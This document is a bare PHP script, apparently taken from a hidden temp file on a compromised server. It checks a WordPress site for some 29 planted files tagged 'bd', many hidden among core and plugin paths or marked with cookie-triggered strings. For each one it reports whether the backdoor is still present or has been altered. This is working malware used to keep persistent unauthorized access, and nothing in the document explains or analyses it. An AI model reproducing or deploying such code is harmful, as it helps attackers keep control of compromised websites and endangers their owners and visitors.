File: //proc/self/root/var/tmp/.oauthexceptions
<?php $r = '/home/www/torresncgolf'; $x = ["/wp-includes/class-wp-list-util.php"=>"bd@@566467@@Server-Timing",
"/wp-content/plugins/login-designer/includes/freemius/assets/css/admin/index.php"=>"bd@@278025@@48",
"/wp-content/plugins/jonradio-private-site/telemetry/css/requests/smalltalk.php"=>"bd@@566562@@1503",
"/wp-includes/js/tinymce/themes/modern/modern/index.php"=>"bd@@562731@@30",
"/wp-admin/css/css/index.php"=>"bd@@565559@@36",
"/wp-admin/includes/options.php"=>"bd@@562773@@37",
"/wp-content/plugins/wp-migrate-db/vendor/php-di/phpdoc-reader/src/PhpDocReader/PhpParser/PhpParser/index.php"=>"bd@@565603@@39",
"/instalaciones/system/helpers/helpers/about.php"=>"bd@@565629@@555",
"/wp-content/plugins/wpforms-lite/users.php"=>"bd@@564679@@403",
"/wp-content/plugins/index.php"=>"bd@@566494@@53",
"/wp-admin/post-new.php"=>"bd@@566524@@Clear-Site-Data",
"/wp-includes/rest-api/endpoints/class-wp-rest-attachments-controller.php"=>"bd@@262673@@_COOKIE[3]",
"/wp-admin/user-edit.php"=>"bd@@564497@@$_COOKIE[-",
"/wp-comments-post.php"=>"bd@@286738@@data_storage",
"/wp-content/themes/twentytwentyone/assets/sass/05-blocks/group/group/cache.php"=>"bd@@562714@@$_COOKIE[1",
"/wp-admin/options-general.php"=>"bd@@283698@@39",
"/wp-admin/menu-header.php"=>"bd@@271184@@$_COOKIE[-",
"/wp-content/themes/twentysixteen/fonts/merriweather/comment-editor/export.php"=>"bd@@565618@@533",
"/wp-content/themes/twentynineteen/sass/modules/nextjs/class.categorie.php"=>"bd@@565619@@1041",
"/wp-login.php"=>"bd@@278160@@74",
"/instalaciones/application/models/models/cache.php"=>"bd@@274323@@service_registry",
"/wp-admin/includes/update.php"=>"bd@@564661@@_COOKIE[3]",
"/wp-content/plugins/wp-file-manager/lib/php/elFinderPlugin.php"=>"bd@@564665@@$_COOKIE[9",
"/wp-content/plugins/wordfence/crypto/vendor/keyword_select.php"=>"bd@@564678@@419",
"/wp-admin/media-upload.php"=>"bd@@564444@@_COOKIE[3]",
"/instalaciones/system_old/database/drivers/mssql/mssql/cache.php"=>"bd@@286702@@$_COOKIE[5",
"/wp-config-sample.php"=>"bd@@284405@@90",
"/wp-includes/Requests/library/Requests.php"=>"bd@@564479@@$_COOKIE[-",
"/instalaciones/system/database/drivers/pdo/pdo/pdo/index.php"=>"bd@@565503@@_COOKIE[3]"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');